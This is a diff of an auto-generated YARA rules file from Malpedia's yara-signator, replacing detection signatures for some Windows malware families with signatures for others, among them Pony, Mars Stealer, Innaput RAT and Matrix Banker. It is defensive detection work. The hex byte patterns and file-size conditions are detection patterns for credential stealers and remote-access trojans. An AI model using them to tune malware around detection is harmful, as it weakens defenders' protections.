-		id = "9a12885d-67d3-50cd-a04d-3dc337c01cc8"
+		id = "559e09c8-5cc7-5636-8b29-09d353ae6b28"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poohmilk_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.firechili_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "f0431f01a34a1352435470a98d80c3656cef1cd2a7cc3eb4ac4c25c7f03235a9"
+		logic_hash = "c22cf39b407e9812d354a7c986ef996dc279b9f043abb338a1580b523e11c3e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95013,32 +95162,32 @@ rule MALPEDIA_Win_Poohmilk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f4 98 40 0020 99 40 00449940 }
-		$sequence_1 = { 3b8de4efffff 7405 83f901 7577 8b502a }
-		$sequence_2 = { 74dc 8bb5acfdffff 8bc6 0b85b0fdffff }
-		$sequence_3 = { 33ff 397e38 0f8583000000 397e14 757e 397e1c }
-		$sequence_4 = { 8bd6 0bd7 0f85ae000000 8b9570d2ffff 8b5238 }
-		$sequence_5 = { 6880000000 6a03 6a00 6a07 6800000080 56 ff15???????? }
-		$sequence_6 = { 0f8574020000 0fb79d02f0ffff 0fb79500f0ffff 895e10 3bda 0f855b020000 }
-		$sequence_7 = { 7425 56 ff15???????? 8b856cf3ffff }
-		$sequence_8 = { ffd3 8d85a0f3ffff 50 8d8decfdffff 51 ffd3 }
-		$sequence_9 = { ffd3 6a00 8d85ecfdffff 50 }
+		$sequence_0 = { 53 488d6c24b1 4881ec98000000 48894d17 4c8d4507 }
+		$sequence_1 = { 4885c0 745a 483bc3 7455 }
+		$sequence_2 = { 0f114fb0 0f1043c0 0f1147c0 0f104bd0 0f114fd0 0f1043e0 0f1147e0 }
+		$sequence_3 = { 4c8d4507 4889450f 488d4d7f 488d45f7 48897c2430 0f57c0 897c2428 }
+		$sequence_4 = { 7c6c 488b4840 4885c9 742d f6410a05 7406 488b4118 }
+		$sequence_5 = { e8???????? 488b7c2428 0fb6f0 4885ff 744f }
+		$sequence_6 = { 664585db 750c 410fb7d0 488bcb 48d1ea eb05 b80d0000c0 }
+		$sequence_7 = { 3c02 773d ff05???????? 488d0da7490000 ff15???????? }
+		$sequence_8 = { 0f8420010000 4883feff 0f840d010000 488d8424a0000000 48895c2428 4533c9 }
+		$sequence_9 = { 488d0d7d490000 ff15???????? 488b7c2430 33c0 48894308 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 91136
 }
-rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE
+rule MALPEDIA_Win_Innaput_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5ccf1f6-f470-5408-b195-08329344ed8e"
+		id = "8696fe6d-5c5e-50d1-8126-e510e7272553"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.apocalypse_ransom_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.innaput_rat_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "18df20f7eebe1c78a082ce30f5a4491f9ac67772b997a33222fc4d85121626f7"
+		logic_hash = "9fc4a0f22b0936282c888c32e9151fce9421447e6433604a7df7c0949331d6ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95052,34 +95201,73 @@ rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 8bf8 6a3d 893d???????? ffd3 8bf0 }
-		$sequence_1 = { 50 8d8c2410040000 51 ff15???????? 8d442408 e8???????? }
-		$sequence_2 = { 0bd7 7479 56 8d44241c 68???????? 50 }
-		$sequence_3 = { 89442424 8b44241c 6a6d 50 c744243006000000 c74424346d000000 }
-		$sequence_4 = { ff15???????? 68???????? 8d84240c040000 50 ff15???????? 85c0 742f }
-		$sequence_5 = { e8???????? 6a6d 56 ff15???????? 8b3d???????? }
-		$sequence_6 = { 68???????? ff15???????? 8d542408 52 ff15???????? 83f8ff }
-		$sequence_7 = { 0bd7 7479 56 8d44241c 68???????? 50 ffd5 }
-		$sequence_8 = { 8d442410 50 68???????? 6802000080 ffd6 8d4c2414 }
-		$sequence_9 = { 6a01 6800000080 8d4c2440 51 ffd6 8bf8 }
+		$sequence_0 = { 3bc3 751b 53 53 53 6a06 }
+		$sequence_1 = { ffd7 8b4510 898618060000 8b4514 8b00 89861c060000 }
+		$sequence_2 = { 740f 8b4d08 e8???????? 3b450c 72d9 eb02 }
+		$sequence_3 = { 50 56 ff15???????? 89be14040000 }
+		$sequence_4 = { 8b4d08 e8???????? 3b450c 72d9 }
+		$sequence_5 = { ff5704 59 8b0e 894104 8b06 }
+		$sequence_6 = { 53 53 53 6a06 6a01 6a02 ff15???????? }
+		$sequence_7 = { 8d8608020000 50 ffd7 8b4510 898618060000 }
+		$sequence_8 = { 85c0 7413 3bc6 740f 8b4d08 e8???????? 3b450c }
+		$sequence_9 = { 391e 75fa 6a0c ff5704 59 8906 3bc3 }
+
+	condition:
+		7 of them and filesize < 73728
+}
+rule MALPEDIA_Win_Matrix_Banker_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "fbbbed54-1d1e-54ca-b972-776370388fdc"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matrix_banker_auto.yar#L1-L118"
+		license_url = "N/A"
+		logic_hash = "418333eb6355aa1c00334bbe82cc7f9927e2216ee2cd2f63bf5855e96db3a4a8"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 8d4a9f 80f905 7705 80c2a9 }
+		$sequence_1 = { eb16 8d489f 80f905 7704 04a9 eb0a }
+		$sequence_2 = { 8d489f 80f905 7704 04a9 eb0a 8d48bf }
+		$sequence_3 = { 04a9 eb0a 8d48bf 80f905 }
+		$sequence_4 = { e8???????? 85c0 740a e8???????? 83f8ff }
+		$sequence_5 = { eb0a 8d48bf 80f905 7702 04c9 8d4ad0 80f909 }
+		$sequence_6 = { 8d4abf 80f905 7703 80c2c9 }
+		$sequence_7 = { eb18 8d4a9f 80f905 7705 80c2a9 eb0b 8d4abf }
+		$sequence_8 = { 80f905 7704 04a9 eb0a 8d48bf }
+		$sequence_9 = { 8d4a9f 80f905 7705 80c2a9 eb0b 8d4abf }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 422912
 }
-rule MALPEDIA_Win_Tinymet_Auto : FILE
+rule MALPEDIA_Win_Neutrino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b877ab0-4cfd-5a16-b545-cbd2432f7e3a"
+		id = "9a95af10-a741-56c4-8bb8-54cc2e65dd52"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinymet_auto.yar#L1-L102"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neutrino_auto.yar#L1-L330"
 		license_url = "N/A"
-		logic_hash = "18fdd73d173a567cb669dcb2f204fa6a5132161bf80e753f323b92b81adc0ad1"
-		score = 75
-		quality = 75
+		logic_hash = "326fe9ea9352871202c596bbb0d54c8449971285bd5a9b495a305700faaa6e71"
+		score = 60
+		quality = 43
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -95091,30 +95279,56 @@ rule MALPEDIA_Win_Tinymet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 6a01 eb1b 6a01 }
-		$sequence_1 = { e8???????? 59 3bf0 72ee 5f 5e }
-		$sequence_2 = { 56 668907 e8???????? 83c702 a3???????? 6a5f }
-		$sequence_3 = { a3???????? 5e c3 68???????? e8???????? 59 }
-		$sequence_4 = { 50 e8???????? 83c40c 83f85c 75e4 }
-		$sequence_5 = { e9???????? 8b400c ff750c 8b00 8b00 }
-		$sequence_6 = { 83feff 751b 68???????? e9???????? ff15???????? 85c0 }
-		$sequence_7 = { 85f6 7509 a1???????? 8b30 eb03 83c602 }
+		$sequence_0 = { ff15???????? c1e010 50 ff15???????? }
+		$sequence_1 = { 50 6a0b 6a07 e8???????? }
+		$sequence_2 = { 50 6a05 6a03 e8???????? }
+		$sequence_3 = { 0404 0404 0402 0202 0202 }
+		$sequence_4 = { 837d0800 7408 8b4508 a3???????? 8b0d???????? 894df8 eb09 }
+		$sequence_5 = { 8b45ac 50 ff15???????? 8945d0 837dd000 }
+		$sequence_6 = { 0fbe08 3bd1 7513 8b55f4 c60200 8b45f4 83c001 }
+		$sequence_7 = { 8b4df8 0fbe11 3bc2 740b 8b45fc 83c001 8945fc }
+		$sequence_8 = { 83c001 8945fc ebdb 8b4dfc 0fbe11 85d2 7502 }
+		$sequence_9 = { 8b4d0c 894dfc 8b55f4 0fbe02 85c0 7447 8b4df4 }
+		$sequence_10 = { 6a00 6a00 e8???????? 83c40c 0fb6c0 }
+		$sequence_11 = { e9???????? 6a01 ff15???????? 85c0 }
+		$sequence_12 = { 0404 010404 0202 020402 0404 }
+		$sequence_13 = { 8945fc 8b4d08 83c101 894d08 0fb6550c 83fa01 7509 }
+		$sequence_14 = { 50 ff15???????? 837dfc00 0f95c0 8be5 }
+		$sequence_15 = { 020402 0404 0404 0404 0404 0404 0403 }
+		$sequence_16 = { 6a00 ff15???????? 6880000000 ff15???????? }
+		$sequence_17 = { 8b55f8 83c201 8955f8 8b45f8 0fbe08 85c9 7439 }
+		$sequence_18 = { 83ec14 8b4508 53 57 6a1c 8945f4 59 }
+		$sequence_19 = { 75f4 c3 8b4804 890e ff4808 897004 751e }
+		$sequence_20 = { 7448 f645fe40 7420 f645ff08 0f8485000000 814a1808010000 }
+		$sequence_21 = { 0f879a000000 807dfd01 0f8597000000 e9???????? 2d8c000000 747e 48 }
+		$sequence_22 = { 807dfd04 c645fc03 0f84ae000000 807dfd05 eb12 807dfd04 }
+		$sequence_23 = { 83c302 f645fe02 740a 834a1804 8a03 884210 43 }
+		$sequence_24 = { 7408 83c6fb a5 66a5 eb01 a5 }
+		$sequence_25 = { 7409 8bd0 8b00 85c0 75f4 c3 8b4804 }
+		$sequence_26 = { 8d85b8feffff 50 68???????? ff15???????? 8945fc }
+		$sequence_27 = { 83c40c 6804010000 8d85f8fdffff 50 }
+		$sequence_28 = { ff750c ff7508 ff15???????? 83f8ff 0f95c0 5d }
+		$sequence_29 = { eb05 68???????? 50 ff510c }
+		$sequence_30 = { 57 33ff 393d???????? 7522 be???????? ff15???????? 57 }
+		$sequence_31 = { 50 ff15???????? 6a40 ff75f0 }
+		$sequence_32 = { 85c0 7412 68???????? 50 ff15???????? f7d8 }
+		$sequence_33 = { ff15???????? 6a64 e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Uacme_Auto : FILE
+rule MALPEDIA_Win_Cosmicduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff7de611-297b-5087-b1a6-103aa95a4d6a"
+		id = "5fb60344-131a-5131-b8e1-4edb7524b3e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.uacme_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cosmicduke_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "07027ccb25725e405fe664bc8c5892aae7b19e4bf0683cd3f46495797cb60d93"
+		logic_hash = "7c78d88a6294fbefeccb9e02496af3e7aa8e7c4fd27d39a3747c54e6c53a3f19"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95128,32 +95342,32 @@ rule MALPEDIA_Win_Uacme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 7515 834dfcff 56 8b7514 85f6 }
-		$sequence_1 = { 8d85fcfeffff 50 ff15???????? 8a85fcfeffff 8d95fcfeffff }
-		$sequence_2 = { 8d45a8 50 ff15???????? 8d45f0 50 }
-		$sequence_3 = { 56 ff15???????? 68???????? 6806600000 56 }
-		$sequence_4 = { 53 c744247030000000 c744247420000000 c744247897344000 895c247c 899c2480000000 89bc2484000000 }
-		$sequence_5 = { 50 57 ff15???????? 8d4c2428 }
-		$sequence_6 = { 750d ffd6 3db7000000 0f8567010000 ba???????? 8d8ddcfbffff e8???????? }
-		$sequence_7 = { 52 57 57 53 51 ff500c }
-		$sequence_8 = { 83f915 89742420 0f44c6 895c2414 a3???????? }
-		$sequence_9 = { 75f7 8b4dfc ba???????? 8d4930 e8???????? 8b4dfc ba???????? }
+		$sequence_0 = { e9???????? 8db514ffffff e9???????? 8db504ffffff e9???????? b8???????? e9???????? }
+		$sequence_1 = { ff15???????? 6a02 6a02 6800000040 ff7510 53 ff15???????? }
+		$sequence_2 = { c644240f01 85f6 0f8594000000 ff742418 8d842414010000 ff742428 }
+		$sequence_3 = { 668985ecfeffff 0fb645fb 50 0fb645fa 50 0fb645f9 }
+		$sequence_4 = { 56 ff15???????? 885c2417 ebdd 33c9 394c2408 7e0f }
+		$sequence_5 = { 5f 85c0 7444 8b442454 8944240c 53 8d442414 }
+		$sequence_6 = { 83ffff 7416 8d45e4 50 57 ff15???????? 85c0 }
+		$sequence_7 = { 8bf8 8a8358020000 8bf3 8845ff e8???????? 84c0 0f84ae000000 }
+		$sequence_8 = { 53 53 8d44242c 50 ff15???????? 85c0 740d }
+		$sequence_9 = { 8b1d???????? 83c40c 8d842490000000 50 8d842414010000 50 ffd3 }
 
 	condition:
-		7 of them and filesize < 565248
+		7 of them and filesize < 456704
 }
-rule MALPEDIA_Win_Bleachgap_Auto : FILE
+rule MALPEDIA_Win_Pony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0b3bd641-91e1-5a44-a4c8-6d070b78b23b"
+		id = "24263a04-20d7-5949-957f-cf3a5af796d6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bleachgap_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pony_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "3130a827d52ec3314a8f25fbc828dbf76548d8c3f7d1048f0043a6b2ade8d5de"
+		logic_hash = "f326d7c326c50f16cd34726bcea70a2ea74ad41815b2b6e851f1de5995c35b2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95167,32 +95381,32 @@ rule MALPEDIA_Win_Bleachgap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff742420 e8???????? 83c404 8bc3 5f 5e 5d }
-		$sequence_1 = { ff7604 8bf8 e8???????? 83c410 8bf0 85ff 0f8444020000 }
-		$sequence_2 = { c3 ff760c e8???????? 83c404 8944241c 85c0 0f8432010000 }
-		$sequence_3 = { 8b85d8f6ffff 0fb7048574ae5f00 8d048570a55f00 50 8d85f0f6ffff 03c7 50 }
-		$sequence_4 = { e8???????? 83c404 c645fc09 85ff 742d 8b4de8 8bc7 }
-		$sequence_5 = { ff442418 85f6 0f8564feffff 8b5c2410 53 e8???????? 83c404 }
-		$sequence_6 = { 8b8424bc000000 8b00 85c0 0f45c8 33db 894c2410 33ed }
-		$sequence_7 = { ba02000000 89471c 8bdd 8bf5 eb42 01471c 8bdd }
-		$sequence_8 = { c745e400000000 c745e80f000000 8a01 41 84c0 75f9 2bca }
-		$sequence_9 = { ff7650 e8???????? 83cdff 8d4e10 83c404 896c2420 837e7800 }
+		$sequence_0 = { ff75fc ff15???????? 5e c9 c20400 55 8bec }
+		$sequence_1 = { 8d840744eabea4 034604 c1c004 03c3 8bfb 33f9 33f8 }
+		$sequence_2 = { e8???????? ffb5dcf7ffff ff7508 e8???????? }
+		$sequence_3 = { 8bf0 e9???????? 8b4514 833800 7505 e9???????? c745fc00000000 }
+		$sequence_4 = { c20c00 55 8bec 81c4ecfeffff 53 ff750c }
+		$sequence_5 = { 55 8bec 83c4fc 6a00 6a06 ff7508 }
+		$sequence_6 = { ff7510 e8???????? 8d45dc 50 8d45e0 50 8d45e4 }
+		$sequence_7 = { ff7514 ff7510 ff7508 e8???????? 8bf8 837dfc00 7423 }
+		$sequence_8 = { 8d8c0f8e4379a6 034e38 c1c111 03ca 8bfa }
+		$sequence_9 = { c9 c20400 55 8bec 83c4f4 57 8b4514 }
 
 	condition:
-		7 of them and filesize < 4538368
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Govrat_Auto : FILE
+rule MALPEDIA_Win_Mars_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff29bbeb-8470-59b6-8c8d-ff2db3e011bb"
+		id = "89d493f9-e4b1-533f-82c2-eb346efb826d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.govrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mars_stealer_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "c76f210fc8b3b328515ee8d578bc776ba7dc3be5b77e3088a18f7d949286c3a2"
+		logic_hash = "fa77ecd9a121fc69a9c627c8a10e5db8b46b11ecb902d48795d692c6a136b780"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95206,32 +95420,32 @@ rule MALPEDIA_Win_Govrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1fa05 8b1495609e4300 83e61f c1e606 f644320480 7417 8bd1 }
-		$sequence_1 = { 5b c3 55 8bec 81ec84010000 a1???????? 33c5 }
-		$sequence_2 = { d1f8 e8???????? 5e c20800 807c240400 7428 837e1808 }
-		$sequence_3 = { e8???????? 8b4658 85c0 755f 83ff14 720e 3945f8 }
-		$sequence_4 = { 2aca d3e8 8bca d3e7 8d8ba00e0300 51 03c7 }
-		$sequence_5 = { c605????????01 e8???????? 837df808 8b45e4 7303 8d45e4 68???????? }
-		$sequence_6 = { 7406 ff15???????? 68d0070000 ff15???????? 6a02 ff15???????? 81fe01000b80 }
-		$sequence_7 = { 83c004 2bfa 4f 8938 83c004 5f 5e }
-		$sequence_8 = { 68???????? eb05 68???????? e8???????? 50 8d4594 50 }
-		$sequence_9 = { 0345f8 8b4d14 8904b1 46 3b7510 72e4 5e }
+		$sequence_0 = { 894508 8b4d08 8b550c 8a02 8801 }
+		$sequence_1 = { 51 e8???????? 83c418 8d95b0fdffff }
+		$sequence_2 = { 83c404 8b4df0 c7414800000000 8b55f0 837a3c00 7416 }
+		$sequence_3 = { 8d8598faffff 50 e8???????? 83c418 8b4d1c 51 }
+		$sequence_4 = { c705????????ac304100 68???????? e8???????? 83c404 a3???????? 68???????? e8???????? }
+		$sequence_5 = { 55 8bec c705????????ac304100 c705????????c4304100 c705????????d4304100 c705????????e4304100 }
+		$sequence_6 = { 8b551c 52 e8???????? 83c410 6a04 8d45f8 50 }
+		$sequence_7 = { 68???????? 8b0d???????? 51 ff15???????? 8b95e4fcffff 52 ff15???????? }
+		$sequence_8 = { 8d8d78ecffff 51 e8???????? 8d95e4d7ffff 52 8d85e0d7ffff 50 }
+		$sequence_9 = { 8bec b8c81f0000 e8???????? c745f0a01f0000 c745ec00000000 c78544e0ffff9e304100 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 219136
 }
-rule MALPEDIA_Win_Rombertik_Auto : FILE
+rule MALPEDIA_Win_Cinobi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0947e6c1-9998-521a-99a5-cdd6a4e22a09"
+		id = "50908ef8-eb52-5007-8c2a-256211d7237f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rombertik_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cinobi_auto.yar#L1-L156"
 		license_url = "N/A"
-		logic_hash = "353c590302f7523faeb3c60893558a9f0763683879e3f9985cd798caf9881314"
+		logic_hash = "1ae8fc64307c077f4211ff04fa6a49a6ca1181e14e0c37993b50c43b3f285591"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95245,34 +95459,39 @@ rule MALPEDIA_Win_Rombertik_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7549 68???????? 8d95e0feffff 52 ffd7 }
-		$sequence_1 = { 0fb69c3500ffffff 03d9 81e3ff000080 7908 4b }
-		$sequence_2 = { 8b5508 8b45fc 52 6800010000 50 }
-		$sequence_3 = { 56 885dfd ff15???????? 85c0 0f846c010000 807dfde9 0f8462010000 }
-		$sequence_4 = { 8d85fcfeffff e8???????? 8b4508 57 }
-		$sequence_5 = { 68ffff1f00 ff15???????? 8bf0 3bf3 7473 }
-		$sequence_6 = { 8d95e0feffff 52 ffd7 85c0 }
-		$sequence_7 = { 83c410 85c0 7409 6a00 ffd0 83c404 5e }
-		$sequence_8 = { 8d95e0feffff 52 ffd6 85c0 }
-		$sequence_9 = { 3bc3 0f8486010000 53 6a01 8d4dfd }
+		$sequence_0 = { c9 c3 55 8bec 51 e8???????? 58 }
+		$sequence_1 = { c9 c3 0fb6d2 0fb6c1 }
+		$sequence_2 = { 8b45c0 ff705f 8b45c0 ff706b ff75dc }
+		$sequence_3 = { ff7067 ff75dc e8???????? 83c40c 8b4dc0 }
+		$sequence_4 = { 8d75e8 8945e4 e8???????? 59 84c0 0f8493000000 8b45ec }
+		$sequence_5 = { 57 ff565f 8986f7000000 8d86a9030000 50 57 ff565f }
+		$sequence_6 = { 59 84c0 751a 57 ff96b3000000 }
+		$sequence_7 = { 668945aa 8b85a8faffff 660fbe4025 668945ac 8b85a8faffff 660fbe4001 }
+		$sequence_8 = { 50 ff93a3000000 8d45cc 50 8bc7 }
+		$sequence_9 = { 6689855afbffff 8b45f8 660fbe403a 6689855cfbffff 8b45f8 }
+		$sequence_10 = { 88842450010000 8a4646 88842451010000 8a460b }
+		$sequence_11 = { 8b45c0 8a4034 8845c9 8b45c0 }
+		$sequence_12 = { 8b45f4 ff9083000000 32c0 eb61 }
+		$sequence_13 = { 8b45f4 ff9083000000 b001 c9 }
+		$sequence_14 = { ffb683000000 57 e8???????? ff765f 898683000000 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 32768
 }
-rule MALPEDIA_Win_Agent_Btz_Auto : FILE
+rule MALPEDIA_Win_Badnews_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "16f92e8e-8ed3-5d53-b4f6-23ff2aafa84a"
+		id = "cbdbb9b6-fd8f-59db-ab40-2a7ebd7420e8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.agent_btz_auto.yar#L1-L501"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badnews_auto.yar#L1-L206"
 		license_url = "N/A"
-		logic_hash = "267846e6f96c5156f52d43399a19aa0f1974b0f38d3edac082778780cdba135e"
+		logic_hash = "615a11c7b728bb1d1522af864993baf4e6b235251c7ea78cc85debae2cde79de"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -95284,81 +95503,43 @@ rule MALPEDIA_Win_Agent_Btz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4c240c 51 ffd6 8d54240c 52 ffd7 }
-		$sequence_1 = { c74608ffffffff f644240801 7409 56 e8???????? 83c404 8bc6 }
-		$sequence_2 = { 50 ffd3 85c0 75d8 5f 5e 5b }
-		$sequence_3 = { ff15???????? b803000f00 8b4df4 64890d00000000 }
-		$sequence_4 = { c706???????? c7460c00000000 895e08 895e04 c7461000000000 }
-		$sequence_5 = { b804000f00 8b4df4 64890d00000000 5f 5e }
-		$sequence_6 = { 6a00 50 ff15???????? 894614 33c0 33db }
-		$sequence_7 = { 56 6a00 68???????? 8935???????? }
-		$sequence_8 = { 740e 50 ff15???????? c74608ffffffff f644240801 }
-		$sequence_9 = { 8b4608 c706???????? 85c0 7413 83f8ff }
-		$sequence_10 = { 8d542408 52 c744240c30000000 c744241003000000 }
-		$sequence_11 = { 6801010000 ff15???????? 85c0 7415 }
-		$sequence_12 = { 6a0a 68???????? 6a01 6a00 }
-		$sequence_13 = { 51 6a00 6819000200 6a00 68???????? }
-		$sequence_14 = { 50 68???????? 6a01 68???????? e8???????? 83c410 }
-		$sequence_15 = { 6a01 6a04 6a01 68???????? }
-		$sequence_16 = { 0fb605???????? 66890d???????? 0fb60d???????? 660fafca }
-		$sequence_17 = { 50 e8???????? 83c408 6800010000 e8???????? }
-		$sequence_18 = { 7511 e8???????? 83c020 50 e8???????? }
-		$sequence_19 = { 89461c 3dea000000 740b 3de5030000 }
-		$sequence_20 = { 6a01 68???????? e8???????? 83c414 5f 5e }
-		$sequence_21 = { 6a01 e8???????? 50 e8???????? 83c418 }
-		$sequence_22 = { c684241401000061 c684241501000073 c684241601000074 c684241701000045 c684241801000072 c684241901000072 }
-		$sequence_23 = { c684248b00000061 c684248c00000074 c684248d00000065 c684248e00000050 c684248f00000072 c68424900000006f }
-		$sequence_24 = { 037d18 59 59 6a04 }
-		$sequence_25 = { 037d14 59 6a04 8d4df0 51 03c7 6a06 }
-		$sequence_26 = { ebd2 c78424a000000068000000 c78424dc00000001000000 33c0 66898424e0000000 }
-		$sequence_27 = { 8365fc00 53 8b5d0c 56 8bf0 8b4624 }
-		$sequence_28 = { c684249200000065 c684249300000073 c684249400000073 c684249500000057 c684249600000000 c684241001000047 c684241101000065 }
-		$sequence_29 = { c684249600000000 c684241001000047 c684241101000065 c684241201000074 c68424130100004c c684241401000061 c684241501000073 }
-		$sequence_30 = { c6458b2f c6458c66 c6458d6f c6458e72 }
-		$sequence_31 = { c684248f00000072 c68424900000006f c684249100000063 c684249200000065 c684249300000073 c684249400000073 }
-		$sequence_32 = { 59 6a70 66894dea 59 }
-		$sequence_33 = { 8d8dfcfeffff 51 8d8d54f9ffff 51 }
-		$sequence_34 = { 59 6a70 66894de4 8bc8 66894de6 }
